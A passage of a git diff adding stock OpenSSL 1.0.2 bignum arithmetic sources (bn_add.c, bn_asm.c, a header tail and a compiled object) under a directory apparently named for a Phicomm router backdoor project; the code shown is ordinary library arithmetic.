+# define BN_F_BN_EXPAND_INTERNAL                          120
+# define BN_F_BN_GF2M_MOD                                 131
+# define BN_F_BN_GF2M_MOD_EXP                             132
+# define BN_F_BN_GF2M_MOD_MUL                             133
+# define BN_F_BN_GF2M_MOD_SOLVE_QUAD                      134
+# define BN_F_BN_GF2M_MOD_SOLVE_QUAD_ARR                  135
+# define BN_F_BN_GF2M_MOD_SQR                             136
+# define BN_F_BN_GF2M_MOD_SQRT                            137
+# define BN_F_BN_MOD_EXP2_MONT                            118
+# define BN_F_BN_MOD_EXP_MONT                             109
+# define BN_F_BN_MOD_EXP_MONT_CONSTTIME                   124
+# define BN_F_BN_MOD_EXP_MONT_WORD                        117
+# define BN_F_BN_MOD_EXP_RECP                             125
+# define BN_F_BN_MOD_EXP_SIMPLE                           126
+# define BN_F_BN_MOD_INVERSE                              110
+# define BN_F_BN_MOD_INVERSE_NO_BRANCH                    139
+# define BN_F_BN_MOD_LSHIFT_QUICK                         119
+# define BN_F_BN_MOD_MUL_RECIPROCAL                       111
+# define BN_F_BN_MOD_SQRT                                 121
+# define BN_F_BN_MPI2BN                                   112
+# define BN_F_BN_NEW                                      113
+# define BN_F_BN_RAND                                     114
+# define BN_F_BN_RAND_RANGE                               122
+# define BN_F_BN_USUB                                     115
+
+/* Reason codes. */
+# define BN_R_ARG2_LT_ARG3                                100
+# define BN_R_BAD_RECIPROCAL                              101
+# define BN_R_BIGNUM_TOO_LONG                             114
+# define BN_R_CALLED_WITH_EVEN_MODULUS                    102
+# define BN_R_DIV_BY_ZERO                                 103
+# define BN_R_ENCODING_ERROR                              104
+# define BN_R_EXPAND_ON_STATIC_BIGNUM_DATA                105
+# define BN_R_INPUT_NOT_REDUCED                           110
+# define BN_R_INVALID_LENGTH                              106
+# define BN_R_INVALID_RANGE                               115
+# define BN_R_NOT_A_SQUARE                                111
+# define BN_R_NOT_INITIALIZED                             107
+# define BN_R_NO_INVERSE                                  108
+# define BN_R_NO_SOLUTION                                 116
+# define BN_R_P_IS_NOT_PRIME                              112
+# define BN_R_TOO_MANY_ITERATIONS                         113
+# define BN_R_TOO_MANY_TEMPORARY_VARIABLES                109
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn.mul b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn.mul
new file mode 100644
index 0000000..9728870
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn.mul
@@ -0,0 +1,19 @@
+We need
+
+* bn_mul_comba8
+* bn_mul_comba4
+* bn_mul_normal
+* bn_mul_recursive
+
+* bn_sqr_comba8
+* bn_sqr_comba4
+bn_sqr_normal -> BN_sqr
+* bn_sqr_recursive
+
+* bn_mul_low_recursive
+* bn_mul_low_normal
+* bn_mul_high
+
+* bn_mul_part_recursive	# symetric but not power of 2
+
+bn_mul_asymetric_recursive # uneven, but do the chop up.
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_add.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_add.c
new file mode 100644
index 0000000..2f3d110
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_add.c
@@ -0,0 +1,313 @@
+/* crypto/bn/bn_add.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include "bn_lcl.h"
+
+/* r can == a or b */
+int BN_add(BIGNUM *r, const BIGNUM *a, const BIGNUM *b)
+{
+    const BIGNUM *tmp;
+    int a_neg = a->neg, ret;
+
+    bn_check_top(a);
+    bn_check_top(b);
+
+    /*-
+     *  a +  b      a+b
+     *  a + -b      a-b
+     * -a +  b      b-a
+     * -a + -b      -(a+b)
+     */
+    if (a_neg ^ b->neg) {
+        /* only one is negative */
+        if (a_neg) {
+            tmp = a;
+            a = b;
+            b = tmp;
+        }
+
+        /* we are now a - b */
+
+        if (BN_ucmp(a, b) < 0) {
+            if (!BN_usub(r, b, a))
+                return (0);
+            r->neg = 1;
+        } else {
+            if (!BN_usub(r, a, b))
+                return (0);
+            r->neg = 0;
+        }
+        return (1);
+    }
+
+    ret = BN_uadd(r, a, b);
+    r->neg = a_neg;
+    bn_check_top(r);
+    return ret;
+}
+
+/* unsigned add of b to a */
+int BN_uadd(BIGNUM *r, const BIGNUM *a, const BIGNUM *b)
+{
+    int max, min, dif;
+    BN_ULONG *ap, *bp, *rp, carry, t1, t2;
+    const BIGNUM *tmp;
+
+    bn_check_top(a);
+    bn_check_top(b);
+
+    if (a->top < b->top) {
+        tmp = a;
+        a = b;
+        b = tmp;
+    }
+    max = a->top;
+    min = b->top;
+    dif = max - min;
+
+    if (bn_wexpand(r, max + 1) == NULL)
+        return 0;
+
+    r->top = max;
+
+    ap = a->d;
+    bp = b->d;
+    rp = r->d;
+
+    carry = bn_add_words(rp, ap, bp, min);
+    rp += min;
+    ap += min;
+    bp += min;
+
+    if (carry) {
+        while (dif) {
+            dif--;
+            t1 = *(ap++);
+            t2 = (t1 + 1) & BN_MASK2;
+            *(rp++) = t2;
+            if (t2) {
+                carry = 0;
+                break;
+            }
+        }
+        if (carry) {
+            /* carry != 0 => dif == 0 */
+            *rp = 1;
+            r->top++;
+        }
+    }
+    if (dif && rp != ap)
+        while (dif--)
+            /* copy remaining words if ap != rp */
+            *(rp++) = *(ap++);
+    r->neg = 0;
+    bn_check_top(r);
+    return 1;
+}
+
+/* unsigned subtraction of b from a, a must be larger than b. */
+int BN_usub(BIGNUM *r, const BIGNUM *a, const BIGNUM *b)
+{
+    int max, min, dif;
+    register BN_ULONG t1, t2, *ap, *bp, *rp;
+    int i, carry;
+#if defined(IRIX_CC_BUG) && !defined(LINT)
+    int dummy;
+#endif
+
+    bn_check_top(a);
+    bn_check_top(b);
+
+    max = a->top;
+    min = b->top;
+    dif = max - min;
+
+    if (dif < 0) {              /* hmm... should not be happening */
+        BNerr(BN_F_BN_USUB, BN_R_ARG2_LT_ARG3);
+        return (0);
+    }
+
+    if (bn_wexpand(r, max) == NULL)
+        return (0);
+
+    ap = a->d;
+    bp = b->d;
+    rp = r->d;
+
+#if 1
+    carry = 0;
+    for (i = min; i != 0; i--) {
+        t1 = *(ap++);
+        t2 = *(bp++);
+        if (carry) {
+            carry = (t1 <= t2);
+            t1 = (t1 - t2 - 1) & BN_MASK2;
+        } else {
+            carry = (t1 < t2);
+            t1 = (t1 - t2) & BN_MASK2;
+        }
+# if defined(IRIX_CC_BUG) && !defined(LINT)
+        dummy = t1;
+# endif
+        *(rp++) = t1 & BN_MASK2;
+    }
+#else
+    carry = bn_sub_words(rp, ap, bp, min);
+    ap += min;
+    bp += min;
+    rp += min;
+#endif
+    if (carry) {                /* subtracted */
+        if (!dif)
+            /* error: a < b */
+            return 0;
+        while (dif) {
+            dif--;
+            t1 = *(ap++);
+            t2 = (t1 - 1) & BN_MASK2;
+            *(rp++) = t2;
+            if (t1)
+                break;
+        }
+    }
+#if 0
+    memcpy(rp, ap, sizeof(*rp) * (max - i));
+#else
+    if (rp != ap) {
+        for (;;) {
+            if (!dif--)
+                break;
+            rp[0] = ap[0];
+            if (!dif--)
+                break;
+            rp[1] = ap[1];
+            if (!dif--)
+                break;
+            rp[2] = ap[2];
+            if (!dif--)
+                break;
+            rp[3] = ap[3];
+            rp += 4;
+            ap += 4;
+        }
+    }
+#endif
+
+    r->top = max;
+    r->neg = 0;
+    bn_correct_top(r);
+    return (1);
+}
+
+int BN_sub(BIGNUM *r, const BIGNUM *a, const BIGNUM *b)
+{
+    int max;
+    int add = 0, neg = 0;
+    const BIGNUM *tmp;
+
+    bn_check_top(a);
+    bn_check_top(b);
+
+    /*-
+     *  a -  b      a-b
+     *  a - -b      a+b
+     * -a -  b      -(a+b)
+     * -a - -b      b-a
+     */
+    if (a->neg) {
+        if (b->neg) {
+            tmp = a;
+            a = b;
+            b = tmp;
+        } else {
+            add = 1;
+            neg = 1;
+        }
+    } else {
+        if (b->neg) {
+            add = 1;
+            neg = 0;
+        }
+    }
+
+    if (add) {
+        if (!BN_uadd(r, a, b))
+            return (0);
+        r->neg = neg;
+        return (1);
+    }
+
+    /* We are actually doing a - b :-) */
+
+    max = (a->top > b->top) ? a->top : b->top;
+    if (bn_wexpand(r, max) == NULL)
+        return (0);
+    if (BN_ucmp(a, b) < 0) {
+        if (!BN_usub(r, b, a))
+            return (0);
+        r->neg = 1;
+    } else {
+        if (!BN_usub(r, a, b))
+            return (0);
+        r->neg = 0;
+    }
+    bn_check_top(r);
+    return (1);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_add.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_add.o
new file mode 100644
index 0000000000000000000000000000000000000000..4f65370f8d79fc5ef09d054c59d87ce84abb8e10
GIT binary patch
literal 3240
zcmbtV|8Emz7=OEV?7(s>C^9pGl`LipQrbCmor&pncjGPTAPj~ILh0JVBCMP3UEEag
zho*$rb83t+{tF}~@`FDZjanvg)+q4@2qs3I6OmEDsR+X_sn2uw9=mm|n)oE|z3=;Z
zpXc*F-|p@?CE8Qxa1cuz<Y6+uvrs|?m(H(4#xg{f6F2#_aqaKYBN299+9mZ%JNqg7
zZ3kt4Y}dm=utzwugtBuHc0<-vf}#%#axmdO`jE^Lg2FCF^%RlW4As|1^wmn+)hN42
z*-w{{Jd!v^Pfa@`tU$-*RV3<|?#&mp2TI-2xZ2{N>>E>y6#@k~P#-P5LG>=0D+n|<
zAxPyjbbK3V(K(tgYK=<%x;8~8jj+ny0&LZWK#>L~G;y-qgV(){5tmj{z2g(gIzFc5
zQ<2~qZMHPEd(U3!acQr#Pl|nLM#{t7v0c^=2>Nb8X5Y7cHP);I3W4G~NuYT@3y%++
z@GyKVZH%zLBJ4V3NDdx!KYM#bzq40g&Atd+kLX7T*p)hEcG1wK5aU#!FmnNnsqX%z
z7ls1itp%-UuqZXYR-ol#w5>>)`vxt4M1!;1`I6f@eWg(Pj-HxwQpW^!%%S1B{1x?0
zsxPxLQ~r#OKUt=1#7K-Qe?^;yG^imqlP{`WRBxxupS$T$H&Q(#fSQoIS*NapjR!WK
z+)byt3N}qZ=Y>Rjb2BdFDorRXB^WuBCKV&0O8&ypdm@R`P`$}Hn!5yb85M|DFO@&l
zW^ZXP$}Tiegq^+BL$aRs$iXK(>SGE7Vz$yXTbJYuV|P<_*+9&WfCRcAqwP>vqoj95
z*)(NWt%iY=e7m6JOO3qC?2w21Vph3|A9~n>PPnD_kQj)>QVZNBMA$WG@lw;Gi&~Ji
zv_;a@79pq!jlG%>%({=PuzbN{qpw@QzbN~`a0CMKE+YDp2V*vAb7jElyF8-O*H#Q<
zb9Z-_x3zyjORJhU=)2$N-w=3EGq!=F?S7xXqs@c~aX~a#vU(VsxAv1dLJEjs1Ebtw
zPQ>waA90L&9L??q;blmH4EP#;b{Xd$(eqNBA~wC~42#}zS6FO)p<WXG$Ck)qXRbjO
zLv@p4CjgSz3JPJdDJ*)zqCmkk$$9o+Y7HJZUc@6Ik0geivZERin0CN8$+?c>3|!-N
z!1aPt7QM$@ve=rdmqmZwkk~4TUdi&I6I6}-!+iRm>`pASL)BV>p}5G;<!a~7s$W>l
zxs~;WR!*Zz3o+a|$&$sOfj88^g&H_kf1xac?Mj=UMvV>3?3abwgtP)+y!sUfn`+=8
zz>(kLHEItSt)ah*>r-e@l;h?^_QG84-W1@-|2fw;>WVf4=~z6O^d(4mYfOU`iEWN<
z3ro@1ww|6H%FftMDI8T|TrKw0a3-0>O=@%`o=&zKR#|O;D1Cjg5lxMyGMV8FqDY05
ziJ=jkQ3s{Zc$)9oZLt2cY|5w&ciZqa*f=0A7$OWypW1M{{wR+R^)U~Y{_{3`xeY&2
z125Qc{MB1LD|t&Iza8IX!|nb=Y`EQ@JvQ9#&oeb}FWiTMZgJO){h;xj$F2T(s{*(B
z<i`r!>IdS>jt!~t0hrZ{IS*Q^OzLplr=~_#;!DQWIPnc+v&5Ge9vVue0ZR|7DIa_*
zH)Pd#;t<~-Ol!W8%<xDmqmB`u!H^n^9mvFouoM5kc!2_2pz@6m0fzD_&!f3Bb*(kd
z%`mWrAsBYq&p#ENyua|h$ECoPn)rM#$1AQOXDb1&&*}J%ko#bToR#YT)jj~W$mxe+
z7t4OV9fY-YzcqK+FuQ8G(jk6m*;%?<V1cQ!_o8uzNd@s5&-sUyKMNUv1#(u}doBBl
z3oGsMJ6ElKuXDxyaE^lYL&&nX>R0V<)DQ7b|4Dv7exvX`ue3+3TB>GwLmq~6yHtcj
PR={C3`#FBmzuEr{8?t)P

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_asm.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_asm.c
new file mode 100644
index 0000000..03a33cf
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_asm.c
@@ -0,0 +1,1093 @@
+/* crypto/bn/bn_asm.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef BN_DEBUG
+# undef NDEBUG                  /* avoid conflicting definitions */
+# define NDEBUG
+#endif
+
+#include <stdio.h>
+#include <assert.h>
+#include "cryptlib.h"
+#include "bn_lcl.h"
+
+#if defined(BN_LLONG) || defined(BN_UMULT_HIGH)
+
+BN_ULONG bn_mul_add_words(BN_ULONG *rp, const BN_ULONG *ap, int num,
+                          BN_ULONG w)
+{
+    BN_ULONG c1 = 0;
+
+    assert(num >= 0);
+    if (num <= 0)
+        return (c1);
+
+# ifndef OPENSSL_SMALL_FOOTPRINT
+    while (num & ~3) {
+        mul_add(rp[0], ap[0], w, c1);
+        mul_add(rp[1], ap[1], w, c1);
+        mul_add(rp[2], ap[2], w, c1);
+        mul_add(rp[3], ap[3], w, c1);
+        ap += 4;
+        rp += 4;
+        num -= 4;
+    }
+# endif
+    while (num) {
+        mul_add(rp[0], ap[0], w, c1);
+        ap++;
+        rp++;
+        num--;
+    }
+
+    return (c1);
+}
+
+BN_ULONG bn_mul_words(BN_ULONG *rp, const BN_ULONG *ap, int num, BN_ULONG w)
+{
+    BN_ULONG c1 = 0;
+
+    assert(num >= 0);
+    if (num <= 0)
+        return (c1);
+
+# ifndef OPENSSL_SMALL_FOOTPRINT
+    while (num & ~3) {
+        mul(rp[0], ap[0], w, c1);
+        mul(rp[1], ap[1], w, c1);
+        mul(rp[2], ap[2], w, c1);
+        mul(rp[3], ap[3], w, c1);
+        ap += 4;
+        rp += 4;
+        num -= 4;
+    }
+# endif
+    while (num) {
+        mul(rp[0], ap[0], w, c1);
+        ap++;
+        rp++;
+        num--;
+    }
+    return (c1);
+}
+
+void bn_sqr_words(BN_ULONG *r, const BN_ULONG *a, int n)
+{
+    assert(n >= 0);
+    if (n <= 0)
+        return;
+
+# ifndef OPENSSL_SMALL_FOOTPRINT
+    while (n & ~3) {
+        sqr(r[0], r[1], a[0]);
+        sqr(r[2], r[3], a[1]);
+        sqr(r[4], r[5], a[2]);
+        sqr(r[6], r[7], a[3]);
+        a += 4;
+        r += 8;
+        n -= 4;
+    }
+# endif
+    while (n) {
+        sqr(r[0], r[1], a[0]);
+        a++;
+        r += 2;
+        n--;
+    }
+}
+
+#else                           /* !(defined(BN_LLONG) ||
+                                 * defined(BN_UMULT_HIGH)) */
+
+BN_ULONG bn_mul_add_words(BN_ULONG *rp, const BN_ULONG *ap, int num,
+                          BN_ULONG w)
+{
+    BN_ULONG c = 0;
+    BN_ULONG bl, bh;
+
+    assert(num >= 0);
+    if (num <= 0)
+        return ((BN_ULONG)0);
+
+    bl = LBITS(w);
+    bh = HBITS(w);
+
+# ifndef OPENSSL_SMALL_FOOTPRINT
+    while (num & ~3) {
+        mul_add(rp[0], ap[0], bl, bh, c);
+        mul_add(rp[1], ap[1], bl, bh, c);
+        mul_add(rp[2], ap[2], bl, bh, c);
+        mul_add(rp[3], ap[3], bl, bh, c);
+        ap += 4;
+        rp += 4;
+        num -= 4;
+    }
+# endif
+    while (num) {
+        mul_add(rp[0], ap[0], bl, bh, c);
+        ap++;
+        rp++;
+        num--;
+    }
+    return (c);
+}
+
+BN_ULONG bn_mul_words(BN_ULONG *rp, const BN_ULONG *ap, int num, BN_ULONG w)
+{
+    BN_ULONG carry = 0;
+    BN_ULONG bl, bh;
+
+    assert(num >= 0);
+    if (num <= 0)
+        return ((BN_ULONG)0);
+
+    bl = LBITS(w);
+    bh = HBITS(w);
+
+# ifndef OPENSSL_SMALL_FOOTPRINT
+    while (num & ~3) {
+        mul(rp[0], ap[0], bl, bh, carry);
+        mul(rp[1], ap[1], bl, bh, carry);
+        mul(rp[2], ap[2], bl, bh, carry);
+        mul(rp[3], ap[3], bl, bh, carry);
+        ap += 4;
+        rp += 4;
+        num -= 4;
+    }
+# endif
+    while (num) {
+        mul(rp[0], ap[0], bl, bh, carry);
+        ap++;
+        rp++;
+        num--;
+    }
+    return (carry);
+}
+
+void bn_sqr_words(BN_ULONG *r, const BN_ULONG *a, int n)
+{
+    assert(n >= 0);
+    if (n <= 0)
+        return;
+
+# ifndef OPENSSL_SMALL_FOOTPRINT
+    while (n & ~3) {
+        sqr64(r[0], r[1], a[0]);
+        sqr64(r[2], r[3], a[1]);
+        sqr64(r[4], r[5], a[2]);
+        sqr64(r[6], r[7], a[3]);
+        a += 4;
+        r += 8;
+        n -= 4;
+    }
+# endif
+    while (n) {
+        sqr64(r[0], r[1], a[0]);
+        a++;
+        r += 2;
+        n--;
+    }
+}
+
+#endif                          /* !(defined(BN_LLONG) ||
+                                 * defined(BN_UMULT_HIGH)) */
+
+#if defined(BN_LLONG) && defined(BN_DIV2W)
+
+BN_ULONG bn_div_words(BN_ULONG h, BN_ULONG l, BN_ULONG d)
+{
+    return ((BN_ULONG)(((((BN_ULLONG) h) << BN_BITS2) | l) / (BN_ULLONG) d));
+}
+
+#else
+
+/* Divide h,l by d and return the result. */
+/* I need to test this some more :-( */
+BN_ULONG bn_div_words(BN_ULONG h, BN_ULONG l, BN_ULONG d)
+{
+    BN_ULONG dh, dl, q, ret = 0, th, tl, t;
+    int i, count = 2;
+
+    if (d == 0)
+        return (BN_MASK2);
+
+    i = BN_num_bits_word(d);
+    assert((i == BN_BITS2) || (h <= (BN_ULONG)1 << i));
+
+    i = BN_BITS2 - i;
+    if (h >= d)
+        h -= d;
+
+    if (i) {
+        d <<= i;
+        h = (h << i) | (l >> (BN_BITS2 - i));
+        l <<= i;
+    }
+    dh = (d & BN_MASK2h) >> BN_BITS4;
+    dl = (d & BN_MASK2l);
+    for (;;) {
+        if ((h >> BN_BITS4) == dh)
+            q = BN_MASK2l;
+        else
+            q = h / dh;
+
+        th = q * dh;
+        tl = dl * q;
+        for (;;) {
+            t = h - th;
+            if ((t & BN_MASK2h) ||
+                ((tl) <= ((t << BN_BITS4) | ((l & BN_MASK2h) >> BN_BITS4))))
+                break;
+            q--;
+            th -= dh;
+            tl -= dl;
+        }
+        t = (tl >> BN_BITS4);
+        tl = (tl << BN_BITS4) & BN_MASK2h;
+        th += t;
+
+        if (l < tl)
+            th++;
+        l -= tl;
+        if (h < th) {
+            h += d;
+            q--;
+        }
+        h -= th;
+
+        if (--count == 0)
+            break;
+
+        ret = q << BN_BITS4;
+        h = ((h << BN_BITS4) | (l >> BN_BITS4)) & BN_MASK2;
+        l = (l & BN_MASK2l) << BN_BITS4;
+    }
+    ret |= q;
+    return (ret);
+}
+#endif                          /* !defined(BN_LLONG) && defined(BN_DIV2W) */
+
+#ifdef BN_LLONG
+BN_ULONG bn_add_words(BN_ULONG *r, const BN_ULONG *a, const BN_ULONG *b,
+                      int n)
+{
+    BN_ULLONG ll = 0;
+
+    assert(n >= 0);
+    if (n <= 0)
+        return ((BN_ULONG)0);
+
+# ifndef OPENSSL_SMALL_FOOTPRINT
+    while (n & ~3) {
+        ll += (BN_ULLONG) a[0] + b[0];
+        r[0] = (BN_ULONG)ll & BN_MASK2;
+        ll >>= BN_BITS2;
+        ll += (BN_ULLONG) a[1] + b[1];
+        r[1] = (BN_ULONG)ll & BN_MASK2;
+        ll >>= BN_BITS2;
+        ll += (BN_ULLONG) a[2] + b[2];
+        r[2] = (BN_ULONG)ll & BN_MASK2;
+        ll >>= BN_BITS2;
+        ll += (BN_ULLONG) a[3] + b[3];
+        r[3] = (BN_ULONG)ll & BN_MASK2;
+        ll >>= BN_BITS2;
+        a += 4;
+        b += 4;
+        r += 4;
+        n -= 4;
+    }
+# endif
+    while (n) {
+        ll += (BN_ULLONG) a[0] + b[0];
+        r[0] = (BN_ULONG)ll & BN_MASK2;
+        ll >>= BN_BITS2;
+        a++;
+        b++;
+        r++;
+        n--;
+    }
+    return ((BN_ULONG)ll);
+}
+#else                           /* !BN_LLONG */
+BN_ULONG bn_add_words(BN_ULONG *r, const BN_ULONG *a, const BN_ULONG *b,
+                      int n)
+{
+    BN_ULONG c, l, t;
+
+    assert(n >= 0);
+    if (n <= 0)
+        return ((BN_ULONG)0);
+
+    c = 0;
+# ifndef OPENSSL_SMALL_FOOTPRINT
+    while (n & ~3) {
+        t = a[0];
+        t = (t + c) & BN_MASK2;
+        c = (t < c);
+        l = (t + b[0]) & BN_MASK2;
+        c += (l < t);
+        r[0] = l;
+        t = a[1];
+        t = (t + c) & BN_MASK2;
+        c = (t < c);
+        l = (t + b[1]) & BN_MASK2;
+        c += (l < t);
+        r[1] = l;
+        t = a[2];
+        t = (t + c) & BN_MASK2;
+        c = (t < c);
+        l = (t + b[2]) & BN_MASK2;
+        c += (l < t);
+        r[2] = l;
+        t = a[3];
+        t = (t + c) & BN_MASK2;
+        c = (t < c);
+        l = (t + b[3]) & BN_MASK2;
+        c += (l < t);
+        r[3] = l;
+        a += 4;
+        b += 4;
+        r += 4;
+        n -= 4;
+    }
+# endif
+    while (n) {
+        t = a[0];
+        t = (t + c) & BN_MASK2;
+        c = (t < c);
+        l = (t + b[0]) & BN_MASK2;
+        c += (l < t);
+        r[0] = l;
+        a++;
+        b++;
+        r++;
+        n--;
+    }
+    return ((BN_ULONG)c);
+}
+#endif                          /* !BN_LLONG */
+
+BN_ULONG bn_sub_words(BN_ULONG *r, const BN_ULONG *a, const BN_ULONG *b,
+                      int n)
+{
+    BN_ULONG t1, t2;
+    int c = 0;
+
+    assert(n >= 0);
+    if (n <= 0)
+        return ((BN_ULONG)0);
+
+#ifndef OPENSSL_SMALL_FOOTPRINT
+    while (n & ~3) {
+        t1 = a[0];
+        t2 = b[0];
+        r[0] = (t1 - t2 - c) & BN_MASK2;
+        if (t1 != t2)
+            c = (t1 < t2);
+        t1 = a[1];
+        t2 = b[1];
+        r[1] = (t1 - t2 - c) & BN_MASK2;
+        if (t1 != t2)
+            c = (t1 < t2);
+        t1 = a[2];
+        t2 = b[2];
+        r[2] = (t1 - t2 - c) & BN_MASK2;
+        if (t1 != t2)
+            c = (t1 < t2);
+        t1 = a[3];
+        t2 = b[3];
+        r[3] = (t1 - t2 - c) & BN_MASK2;
+        if (t1 != t2)
+            c = (t1 < t2);
+        a += 4;
+        b += 4;
+        r += 4;
+        n -= 4;
+    }
+#endif
+    while (n) {
+        t1 = a[0];
+        t2 = b[0];
+        r[0] = (t1 - t2 - c) & BN_MASK2;
+        if (t1 != t2)
+            c = (t1 < t2);
+        a++;
+        b++;
+        r++;
+        n--;
+    }
+    return (c);
+}
+
+#if defined(BN_MUL_COMBA) && !defined(OPENSSL_SMALL_FOOTPRINT)
+
+# undef bn_mul_comba8
+# undef bn_mul_comba4
+# undef bn_sqr_comba8
+# undef bn_sqr_comba4
+
+/* mul_add_c(a,b,c0,c1,c2)  -- c+=a*b for three word number c=(c2,c1,c0) */
+/* mul_add_c2(a,b,c0,c1,c2) -- c+=2*a*b for three word number c=(c2,c1,c0) */
+/* sqr_add_c(a,i,c0,c1,c2)  -- c+=a[i]^2 for three word number c=(c2,c1,c0) */
+/*
